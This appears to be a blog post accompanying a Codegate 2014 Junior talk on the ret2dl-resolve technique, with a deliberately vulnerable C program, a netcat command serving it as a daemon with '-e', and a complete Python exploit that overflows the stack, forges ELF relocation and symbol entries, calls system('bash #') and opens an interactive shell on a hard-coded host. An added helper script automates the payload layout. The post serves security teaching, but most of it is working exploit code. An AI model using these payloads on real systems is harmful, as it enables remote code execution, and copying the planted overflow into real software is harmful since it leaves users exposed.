Codegate 2014

Codegate 2014 Junior talk: slides, code (binary), exploit

진모씨 2014. 4. 2. 14:37

The slides that went in are a version I submitted ages ago..

And please leave a comment ㅠ (so this doesn't end up with zero replies)


코게 주니어.key 2.zip - Keynote file for Mac

코게 주니어.ppt - converted to PPT


Someone kindly filmed my talk and uploaded it online. Thank you!




The "target code" from the slides

exp.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* read() */

char gbuf[128];                     /* global with a fixed address: the fake ELF structures go here */
int main() {
    char buf[16];                   /* 16-byte stack buffer ... */
    int len = read(0, buf, 128);    /* ... filled with up to 128 bytes: stack overflow, no canary (-fno-stack-protector) */
    read(0, gbuf, 128);             /* second read lands at a known address (gbuf) */
    return 0;
}

Compiled binary (CentOS)


exp


Compile options:

gcc -fno-stack-protector -m32 exp.c -o exp


Running it as a daemon (Linux)

Using nc:

nc.traditional -l -p 7777 -e ./exp

or

nc -l -p 7777 -e ./exp

You can also set it up with inetd or xinetd.


Exploit code

exploit.py

from socket import *
import struct
import time
import sys

buffer = 0x8049680   # "gbuf" address: you must know the address your payload lands at
target = 0x8049658   # read GOT location (the slot the resolver will overwrite with system's address)
dynstr = 0x80481FC   # .dynstr section
jmprel = 0x8048278   # referred in dynamic section (DT_JMPREL, i.e. .rel.plt)
symtab = 0x80481ac   # referred in dynamic section (DT_SYMTAB, i.e. .dynsym)

######## exploit gadgets ##################################
dynamic_linker = 0x80482C0   # PLT0: pushes the link_map and jumps into the dynamic linker
target_plt     = 0x80482F0   # (unused)
cmd = "bash #"               # shell command to execute; "#" swallows whatever follows

p  = lambda x: struct.pack("<L", x)
ph = lambda x: struct.pack("<I", x)   # NOTE: "<I" packs 4 bytes, not 2; the +18 and +46 offsets in rel/sym assume that
pb = lambda x: struct.pack("<B", x)
log = lambda x: sys.stderr.write(x + '\n')

######## rel ##############################################
rel  = p(target)                                          # r_offset: target, anywhere in writable memory
rel += p((((buffer - symtab + 18 + 16) / 16) << 8) + 7)   # r_info: (symbol index << 8) | R_386_JMP_SLOT; 16 multiplier (sizeof Elf32_Sym)

######## sym ##############################################
sym  = p(buffer - dynstr + 46)   # st_name: offset of "system\x00" from .dynstr (sym sits at +28 and is 18 bytes long)
sym += p(0xff)                   # st_value: writable int, isn't it?
sym += p(0xff)                   # symbol size (st_size)
sym += pb(0xff)                  # symbol info (st_info)
sym += pb(0xf0)                  # symbol other - mod 4 must be 0 (visibility DEFAULT, otherwise the linker skips the lookup)
sym += ph(0xffff)                # symbol index (st_shndx); 4 bytes because of ph, see above
sym += "system\x00"
###########################################################

s = socket(AF_INET, SOCK_STREAM)

payload  = ""
payload += rel                         # struct Elf32_Rel -> Elf32_Sym
payload += "A" * (28 - len(payload))   # dummy for multiplier 16 (sym must sit at symtab + 16*index)
payload += sym                         # struct Elf32_Sym -> "system\x00"
payload += cmd

######### stage0 ##########################################
stage0  = ""
stage0 += "A" * 28
stage0 += p(0xDEADBEEF)                          # lands on the saved EBP; the return address is at offset 32
stage0 += p(dynamic_linker)                      # dynamic linker loader (pushes arg1)
stage0 += p(buffer - jmprel)                     # arg2: index here (byte offset of our Elf32_Rel from .rel.plt)
stage0 += p(0xDEADBEEF)                          # ret2: ret after 'system'
stage0 += p(buffer + len(payload) - len(cmd))    # location for cmd
stage0  = stage0.ljust(128)
stage1  = payload                                # just for fun
###########################################################

s.connect(('10.211.55.8', 7777))   # modify_here: your target's IP and port
print "============== exploit: TRIGGER!"
s.send(stage0)
s.send(stage1)

# and there will be console
while True:
    r = raw_input()
    s.send(r + '\n')
    sys.stdout.write(s.recv(102400))
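The hard-coded arithmetic in exploit.py (the +18, +46 and /16) is what makes the fake structures line up with .dynsym and .dynstr. The following is an added example of mine, not code from the post or the talk, written in Python 3 rather than the post's Python 2: it reads DT_STRTAB, DT_SYMTAB and DT_JMPREL out of a 32-bit non-PIE ELF image and lays the fake Elf32_Rel / Elf32_Sym out so that the symbol falls on a 16-byte boundary relative to .dynsym, returning the reloc argument and cmd address the stage-0 chain needs. The gbuf, PLT0 and read@GOT addresses are still inputs you take from the binary (nm, objdump, readelf -r). sample_elf() is a constructed minimal ELF image carrying the post's addresses and exists only so the script runs offline; the fake symbol uses STB_GLOBAL | STT_FUNC with default visibility instead of the post's 0xff / 0xf0 values.

```python
import struct

PT_DYNAMIC = 2
DT_NULL, DT_STRTAB, DT_SYMTAB, DT_JMPREL = 0, 5, 6, 23
R_386_JMP_SLOT = 7
ELF32_SYM_SIZE = 16   # sizeof(Elf32_Sym): the fake symbol must sit at symtab + 16 * index


def parse_dynamic(elf):
    """Pull DT_STRTAB / DT_SYMTAB / DT_JMPREL out of a 32-bit, non-PIE ELF image (bytes).

    For a non-PIE binary the d_val fields are already virtual addresses, i.e. the
    dynstr / symtab / jmprel constants exploit.py hard-codes.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 1:
        raise ValueError("expected an ELFCLASS32 image")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        p_type, p_offset, _, _, p_filesz = struct.unpack_from("<5I", elf, e_phoff + i * e_phentsize)
        if p_type != PT_DYNAMIC:
            continue
        tags = {}
        for off in range(p_offset, p_offset + p_filesz, 8):
            d_tag, d_val = struct.unpack_from("<iI", elf, off)
            if d_tag == DT_NULL:
                break
            tags[d_tag] = d_val
        return {"dynstr": tags[DT_STRTAB], "symtab": tags[DT_SYMTAB], "jmprel": tags[DT_JMPREL]}
    raise ValueError("no PT_DYNAMIC segment")


def build_stage1(buffer, dynstr, symtab, jmprel, got_slot, func=b"system", cmd=b"bash #"):
    """Lay out [Elf32_Rel][pad][Elf32_Sym][func\\0][cmd] for the second read() into gbuf.

    Returns the bytes plus what the stage-0 chain needs: the byte offset of the fake
    Elf32_Rel from DT_JMPREL (the resolver's reloc argument) and the address of cmd.
    """
    sym_off = 8                                          # right after the 8-byte Elf32_Rel ...
    while (buffer + sym_off - symtab) % ELF32_SYM_SIZE:  # ... padded until (addr - symtab) % 16 == 0
        sym_off += 1
    sym_index = (buffer + sym_off - symtab) // ELF32_SYM_SIZE
    name_off = sym_off + ELF32_SYM_SIZE
    cmd_off = name_off + len(func) + 1

    rel = struct.pack("<II", got_slot,                   # r_offset: any writable slot, gets system's address
                      (sym_index << 8) | R_386_JMP_SLOT) # r_info: ELF32_R_INFO(sym_index, R_386_JMP_SLOT)
    sym = struct.pack("<IIIBBH",
                      buffer + name_off - dynstr,        # st_name: offset of "system\0" from .dynstr
                      0, 0,                              # st_value, st_size: unused for an undefined symbol
                      0x12,                              # st_info: STB_GLOBAL | STT_FUNC
                      0,                                 # st_other: low 2 bits (visibility) must be 0 or no lookup runs
                      0)                                 # st_shndx: SHN_UNDEF
    payload = rel + b"A" * (sym_off - len(rel)) + sym + func + b"\x00" + cmd
    assert symtab + sym_index * ELF32_SYM_SIZE == buffer + sym_off
    return {"payload": payload, "sym_index": sym_index,
            "reloc_arg": buffer - jmprel, "cmd_addr": buffer + cmd_off}


def build_stage0(ret_offset, plt0, reloc_arg, cmd_addr, read_len=128):
    """Overflow for the first read(): pad up to the saved return address, then
    PLT0 -> _dl_runtime_resolve(link_map, reloc_arg) -> system(cmd)."""
    chain = b"A" * ret_offset
    chain += struct.pack("<I", plt0)         # return into PLT0: push link_map; jmp *GOT[2]
    chain += struct.pack("<I", reloc_arg)    # i386 passes a byte offset from DT_JMPREL, not an index
    chain += struct.pack("<I", 0xDEADBEEF)   # where system() would return to
    chain += struct.pack("<I", cmd_addr)     # system()'s first argument
    if len(chain) > read_len:
        raise ValueError("chain does not fit in one read()")
    return chain.ljust(read_len, b"\x00")


def sample_elf():
    """Constructed minimal ELF32 image: 52-byte header, one PT_DYNAMIC phdr, 4 dynamic entries.

    Not a real binary, only what parse_dynamic() looks at, carrying the addresses the post
    lists for its CentOS build of exp (an assumption for the self-test).
    """
    dyn = b"".join(struct.pack("<iI", tag, val) for tag, val in (
        (DT_STRTAB, 0x80481FC), (DT_SYMTAB, 0x80481AC), (DT_JMPREL, 0x8048278), (DT_NULL, 0)))
    phdr = struct.pack("<8I", PT_DYNAMIC, 84, 0x8048054, 0x8048054, len(dyn), len(dyn), 6, 4)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, little-endian, EV_CURRENT
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                               2, 3, 1, 0x8048320,   # ET_EXEC, EM_386, EV_CURRENT, e_entry
                               52, 0, 0,             # e_phoff, e_shoff, e_flags
                               52, 32, 1, 40, 0, 0)  # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    return ehdr + phdr + dyn


if __name__ == "__main__":
    d = parse_dynamic(sample_elf())
    s1 = build_stage1(0x8049680, d["dynstr"], d["symtab"], d["jmprel"], got_slot=0x8049658)
    s0 = build_stage0(32, 0x80482C0, s1["reloc_arg"], s1["cmd_addr"])
    print("sym index %d, reloc arg %#x, cmd at %#x" % (s1["sym_index"], s1["reloc_arg"], s1["cmd_addr"]))
    print("stage0: %d bytes, stage1: %d bytes" % (len(s0), len(s1["payload"])))
```

With the post's addresses this picks symbol index 334 (the fake Elf32_Sym at gbuf+12) where exploit.py used 335 (gbuf+28); both are valid because both are 16-byte aligned relative to .dynsym. One caveat the offsets alone do not cover: if the binary has a .gnu.version table, the resolver also indexes it with that same large symbol index, so the halfword at versym + 2*index must be readable (and ideally zero) or the lookup crashes before system is ever found; check with readelf -V before blaming the layout.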

On the line marked modify_here you have to put in your own target IP and port.

For a local run, replace

s.connect(('10.211.55.8', 7777))   # modify_here
print "============== exploit: TRIGGER!"
s.send(stage0)
s.send(stage1)

with

sys.stderr.write("============== exploit: TRIGGER!")

print(stage0 + stage1)

(and drop the interactive while loop at the end, which would try to talk to the unconnected socket), then run it as

(python exploit.py;cat)|./exp

The first read() takes the 128-byte stage0 from the pipe, the second read() takes stage1, and cat keeps stdin open so the bash that system() spawns can read your commands.